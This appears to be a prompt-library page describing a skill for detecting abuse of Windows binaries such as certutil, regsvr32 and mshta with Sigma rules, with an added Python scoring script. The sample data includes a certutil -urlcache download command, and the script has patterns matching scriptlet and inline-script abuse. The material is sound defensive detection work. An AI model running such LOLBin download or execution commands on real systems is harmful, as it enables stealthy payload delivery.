security analyst security skill risk: medium
LOLBAS Abuse Detection with Sigma Rules
The prompt provides an overview, prerequisites, and six-step procedure for detecting abuse of Living Off the Land Binaries using Sysmon process telemetry, Windows Event Logs, and S…
- Policy sensitive
- Human review
SKILL.md
---
name: detecting-living-off-the-land-with-lolbas
description: "Detect Living Off the Land Binaries (LOLBins/LOLBAS) abuse including certutil, regsvr32, mshta, and rundll32"
---

# Detecting Living Off the Land with LOLBAS

## Overview

Living Off the Land Binaries, Scripts, and Libraries (LOLBAS) are legitimate system utilities abused by attackers to execute malicious actions while evading detection. This skill covers detecting abuse of certutil.exe, regsvr32.exe, mshta.exe, rundll32.exe, msbuild.exe, and other LOLBins using process telemetry from Sysmon and Windows Event Logs, combined with Sigma rule-based detection.

## When to Use

- When investigating security incidents that require detecting living off the land with LOLBAS
- When building detection rules or threat hunting queries for this domain
- When SOC analysts need structured procedures for this analysis type
- When validating security monitoring coverage for related attack techniques

## Prerequisites

- Sysmon or Windows Security Event Log (Event ID 4688) with command-line logging enabled
- Sigma rule conversion tool (sigmac or sigma-cli)
- SIEM platform (Splunk, Elastic, or similar) for log ingestion
- Python 3.8+ with pySigma library
- LOLBAS project reference database

## Steps

1. **Establish LOLBin Watchlist** — Build a prioritized list of monitored binaries (certutil, mshta, regsvr32, rundll32, msbuild, installutil, cmstp, wmic, bitsadmin)
2. **Collect Process Telemetry** — Ingest Sysmon Event ID 1 (Process Create) and Windows 4688 events with full command-line capture
3. **Build Sigma Detection Rules** — Create Sigma rules matching suspicious command-line arguments, network activity, and parent-child process anomalies for each LOLBin
4. **Analyze Parent-Child Relationships** — Flag unexpected parent processes spawning LOLBins (e.g., Excel spawning certutil, Word spawning mshta)
5. **Score and Prioritize Alerts** — Apply risk scoring based on argument anomaly, parent process, execution path, and network indicators
6. **Generate Detection Report** — Produce a structured report of all LOLBin abuse detections with MITRE ATT&CK mapping

## Expected Output

- JSON report listing detected LOLBin abuse events with severity scores
- MITRE ATT&CK technique mapping for each detection (T1218, T1105, T1140, T1127)
- Parent-child process anomaly analysis
- Sigma rule match details with raw event data
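As an added example (not the skill's own code, and not an official LOLBAS or Sigma artifact), the script below wires steps 1, 4, 5 and 6 together over a few constructed process-creation events in both Sysmon Event ID 1 and Security 4688 field shapes: watchlist lookup, command-line indicator checks, parent-process and execution-path anomalies, additive risk scoring, and a JSON report carrying the ATT&CK mapping and the raw event. The watchlist, regular expressions, weights and severity thresholds are illustrative assumptions; in a real deployment the argument checks would come from the converted Sigma rules of step 3 rather than the hand-written patterns used here.

```python
"""Score LOLBin process-creation events and emit a JSON detection report.

Added example, not part of the original skill. Watchlist, argument
patterns, weights and thresholds are illustrative assumptions; the sample
events are constructed, not captured from a real host.
"""
import json
import re
from pathlib import PureWindowsPath

# Step 1: watchlisted binaries mapped to the ATT&CK techniques the skill cites
# (T1218 System Binary Proxy Execution, T1105 Ingress Tool Transfer,
#  T1140 Deobfuscate/Decode Files, T1127 Trusted Developer Utilities Proxy Execution).
WATCHLIST = {
    "certutil.exe": ["T1105", "T1140"],
    "regsvr32.exe": ["T1218"],
    "mshta.exe": ["T1218"],
    "rundll32.exe": ["T1218"],
    "msbuild.exe": ["T1127"],
    "installutil.exe": ["T1218"],
    "cmstp.exe": ["T1218"],
    "wmic.exe": ["T1218"],
    "bitsadmin.exe": ["T1105"],
}

# Step 3 stand-in: hand-written command-line indicators (a real deployment
# would take these from converted Sigma rules instead).
ARG_PATTERNS = {
    "remote_url": re.compile(r"https?://", re.I),
    "certutil_fetch_or_decode": re.compile(r"-urlcache\b|-decode\b", re.I),
    "regsvr32_scriptlet": re.compile(r"scrobj\.dll|/i:", re.I),
    "mshta_inline_script": re.compile(r"vbscript:|javascript:", re.I),
}

# Step 4: parents that have no routine reason to spawn a LOLBin.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Directories where the watchlisted binaries legitimately live; a copy run
# from anywhere else is an execution-path anomaly.
EXPECTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64",
                 r"c:\windows\microsoft.net")


def normalize(event):
    """Map Sysmon Event ID 1 or Security 4688 field names onto one shape."""
    return {
        "image": event.get("Image") or event.get("NewProcessName") or "",
        "command_line": event.get("CommandLine") or "",
        "parent": event.get("ParentImage") or event.get("ParentProcessName") or "",
    }


def score_event(event):
    """Return a detection dict for one event, or None if the image is not
    on the watchlist. Scores are additive and capped at 100."""
    e = normalize(event)
    image = PureWindowsPath(e["image"]).name.lower()
    if image not in WATCHLIST:
        return None
    parent = PureWindowsPath(e["parent"]).name.lower()
    score, reasons = 10, ["lolbin_on_watchlist"]

    for name, pattern in ARG_PATTERNS.items():          # argument anomaly
        if pattern.search(e["command_line"]):
            score += 25
            reasons.append(f"arg:{name}")
    if parent in OFFICE_PARENTS:                        # parent anomaly
        score += 40
        reasons.append(f"parent:{parent}")
    image_dir = str(PureWindowsPath(e["image"]).parent).lower()
    if not image_dir.startswith(EXPECTED_DIRS):         # execution-path anomaly
        score += 20
        reasons.append(f"unexpected_path:{image_dir}")

    score = min(score, 100)
    severity = "high" if score >= 70 else "medium" if score >= 40 else "low"
    return {
        "image": image, "parent": parent, "command_line": e["command_line"],
        "score": score, "severity": severity, "reasons": reasons,
        "attack_techniques": WATCHLIST[image], "raw_event": event,
    }


def build_report(events):
    """Step 6: structured report, highest score first."""
    detections = [d for d in map(score_event, events) if d]
    detections.sort(key=lambda d: d["score"], reverse=True)
    return {"total_events": len(events), "detections": detections}


# Constructed sample telemetry: one Sysmon-shaped event, one 4688-shaped
# event, and one benign process for contrast. 203.0.113.0/24 is a
# documentation range.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/x.txt C:\Users\Public\x.txt",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"NewProcessName": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    print(json.dumps(build_report(SAMPLE_EVENTS), indent=2))
```

Run as a script it prints the JSON report; the certutil event launched by Excel with a remote URL scores 100 (high), the rundll32 event from Explorer scores only the base 10 (low) and survives as a low-severity entry for tuning, and notepad is dropped because it is not on the watchlist. The `raw_event` field keeps the original telemetry in the report so an analyst can see what the rule actually matched, which is the "Sigma rule match details with raw event data" output the skill asks for.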
REQUIRED CONTEXT
- Sysmon or Windows Security Event Log (Event ID 4688) with command-line logging
- Sigma rule conversion tool
- SIEM platform
- Python 3.8+ with pySigma
- LOLBAS project reference database
TOOLS REQUIRED
- sigma_rule_conversion
- siem_query
EXPECTED OUTPUT
- Format: structured_report
- Schema: json · detected LOLBin abuse events with severity scores, MITRE ATT&CK technique mapping for each detection, parent-child process anomaly analysis, Sigma rule match details with raw event data
- Constraints
  - JSON report with severity scores
  - include MITRE ATT&CK mapping
  - include parent-child process anomaly analysis
  - include Sigma rule match details with raw event data
CAVEATS
- Dependencies
  - Sysmon or Windows Security Event Log (Event ID 4688) with command-line logging enabled
  - Sigma rule conversion tool (sigmac or sigma-cli)
  - SIEM platform (Splunk, Elastic, or similar) for log ingestion
  - Python 3.8+ with pySigma library
  - LOLBAS project reference database
- Missing context
  - Target SIEM platform configuration details
  - Desired output length or depth
QUALITY
- OVERALL: 0.78
- CLARITY: 0.90
- SPECIFICITY: 0.75
- REUSABILITY: 0.70
- COMPLETENESS: 0.80
IMPROVEMENT SUGGESTIONS
- Add explicit placeholders for LOLBin list and MITRE mappings so the template can be reused for other technique families
- Specify required fields and schema for the JSON report to improve consistency
USAGE
Copy the prompt above and paste it into your AI of choice — Claude, ChatGPT, Gemini, or anywhere else you're working. Replace any placeholder sections with your own context, then ask for the output.